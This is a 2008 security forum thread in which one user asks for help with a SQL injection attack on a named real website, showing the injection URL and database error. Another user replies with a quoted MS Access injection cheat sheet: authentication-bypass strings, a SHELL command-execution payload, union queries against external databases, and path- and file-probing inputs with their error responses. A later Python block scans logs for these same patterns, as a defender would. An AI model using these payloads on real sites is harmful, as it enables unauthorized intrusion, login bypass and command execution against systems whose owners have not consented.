IT Security and Insecurity Portal |
|
|
stuck in SQL injection |
|
Posted: Thu Aug 07, 2008 5:31 pm |
|
|
droidman |
Active user |
|
|
Joined: Dec 10, 2007 |
Posts: 31 |
Usually I don't ask for help on SQL injection, but this time I have no choice since I got really stuck and can't find any information. Maybe it's just me or....
URL:
Code: | http://www.buddhaclub.ws/xpressmailing/subscritor.asp?-=&nome=&email=%27UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%27&submit=procurar |
Error:
Code: | Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'.
/xpressmailing/subscritor.asp, line 343 |
So I can't find any table names and I'm really no expert so.. any help? |
Posted: Thu Aug 07, 2008 6:59 pm |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |
It's a Microsoft Access database. I can post you some info about Access SQLi. I'm sure this would help you.
Code: | % Access SQL Injection
% brett.moore_at_security-assessment.com
============================================================================
Nothing new here, move along..
****************************************************************************
% MS Access system tables
****************************************************************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
****************************************************************************
% MS Access command execution, (older versions only)
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = |SHELL("cmd.exe /c dir > c:\test.txt")|
pass = test
****************************************************************************
% Auth Bypass, Basic
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = ' or '1'='1
pass = test
****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT user,pass FROM users where user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ' union select '0test','0test' from customers in
'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb'
pass = 0test
[Union Notes]
Remember when using unions the sort order can affect the first record
returned.
****************************************************************************
% System Path Disclosure
****************************************************************************
[Sql String]
user = test' union select names from msysobjects in '.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot open the file 'C:\WINNT\system32'.
It is already opened exclusively by another user, or you need permission to view its data.
****************************************************************************
% Verify File Exists
****************************************************************************
[Sql String - non-existent file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[Sql String - existent]
user = test' union select name from msysobjects in '\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\proof.txt'.
****************************************************************************
% Verify Path Exists
****************************************************************************
[Sql String - non-existent path]
test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid path.
Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
[Sql String - existent path]
user = test' union select name from msysobjects in '\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\inetpub\sqlerr'. |
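
A defender's view of the cheat sheet above, as an added example that is not part of the original thread or of the quoted paper: a Python sketch that flags the Access-specific request patterns it lists (system table names, the `IN '<path>'` external-database clause, the `|SHELL(...)|` expression, the quote tautology) in web-server logs, and extracts file-system paths leaked by Jet driver errors in responses. The simplified log layout, `/app/login.asp`, the rule names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request-side markers, all taken from the cheat sheet quoted above.
RULES = [
    ("access_system_table", re.compile(r"\bmsys(aces|objects|queries|relationships)\b", re.I)),
    ("external_db_in_clause", re.compile(r"\bfrom\s+\w+\s+in\s+'", re.I)),
    ("pipe_shell_expression", re.compile(r"\|\s*shell\s*\(", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("quote_tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
]
# Response-side marker: a Jet/ODBC error reaching the client, with the quoted path it leaks.
JET_ERROR = re.compile(r"\[ODBC Microsoft Access Driver\][^']*'([^']+)'")

def scan_query(raw_query):
    """Return the names of the rules that match a URL-encoded query string."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in RULES if rx.search(decoded)]

def leaked_paths(body):
    """Return file-system paths disclosed by Access driver errors in a response body."""
    return JET_ERROR.findall(body)

def scan_log(lines):
    """Yield (timestamp, uri, hits) for log lines whose query matches any rule."""
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue
        date, time, _method, stem, query, _status = line.split()[:6]
        hits = scan_query(query)
        if hits:
            yield f"{date} {time}", stem, hits

# Constructed sample: simplified IIS W3C lines (date time method uri-stem uri-query status).
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-08-07 17:30:55 GET /app/login.asp user=alice&pass=secret 200",
    "2008-08-07 17:31:02 GET /app/login.asp user=%27+or+%271%27%3D%271&pass=test 200",
    "2008-08-07 17:31:40 GET /app/login.asp user=test%27+union+select+name+from+msysobjects+in+%27%5Cproof&pass=x 500",
]
SAMPLE_BODY = ("Microsoft OLE DB Provider for ODBC Drivers (0x80004005) "
               "[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\\proof'.")

if __name__ == "__main__":
    for when, uri, hits in scan_log(SAMPLE_LOG):
        print(when, uri, ",".join(hits))
    print("leaked:", leaked_paths(SAMPLE_BODY))
```

A hit from `leaked_paths` on a production response means detailed driver errors are being returned to clients; serving a generic error page removes the path and file-existence signals the cheat sheet relies on.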
Posted: Fri Aug 08, 2008 9:40 pm |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |